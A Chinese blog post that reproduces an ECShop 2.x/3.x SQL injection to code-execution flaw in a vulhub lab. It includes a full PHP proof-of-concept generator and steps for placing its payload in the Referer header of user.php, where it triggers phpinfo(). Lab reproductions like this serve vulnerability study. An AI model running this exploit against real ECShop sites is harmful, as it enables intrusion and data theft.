温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

ECShop SQL注入任意代码执行漏洞复现是怎样的

发布时间:2021-12-16 18:25:55 来源:亿速云 阅读:510 作者:柒染 栏目:安全技术

ECShop SQL注入任意代码执行漏洞复现是怎样的,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。该漏洞在3.6.0版本之后已修复

影响版本:  Ecshop 2.x    Ecshop 3.x-3.6.0

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境搭建

本次复现环境采用vulhub搭建,执行以下命令搭建平台

cd vulhub/ecshop/xianzhi-2017-02-82239600/

docker-compose up -d

执行之后开放8080端口(2.7.3版本)与8081端口(3.6.0版本)

mysql地址填写 mysql,mysql账户与密码均为 root,数据库名随意填写,但2.7.3与3.6.0的数据库名不能相同。

ECShop SQL注入任意代码执行漏洞复现是怎样的

安装完毕后访问如下图所示

2.7.3版本

ECShop SQL注入任意代码执行漏洞复现是怎样的

3.6.0版本

ECShop SQL注入任意代码执行漏洞复现是怎样的

漏洞链接:http://192.168.101.152:8080/ http://192.168.101.152:8081/

二、漏洞复现

在vulhub上有漏洞利用脚本,拷贝下来放入seay工具的代码调试功能再执行就能得到poc了

<?php 
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr["num"]=$test;
$arr["id"]=$id;

$s = serialize($arr);

$hash4 = '45ea207d7a2b68c49582d2d22adf953a';
$hash3 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash4}ads|{$s}{$hash4}";

?>

ECShop SQL注入任意代码执行漏洞复现是怎样的

2.7.3版本

访问http://192.168.101.152:8080/user.php链接,使用burp抓包,添加referer请求头,然后将poc放入再请求,可以看到执行了phpinfo()

ECShop SQL注入任意代码执行漏洞复现是怎样的

3.6.0版本

也是一样的步骤,访问http://192.168.101.152:8081/user.php,使用burp抓包,将poc放入referer请求头中,就可以看到执行了phpinfo()

ECShop SQL注入任意代码执行漏洞复现是怎样的

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI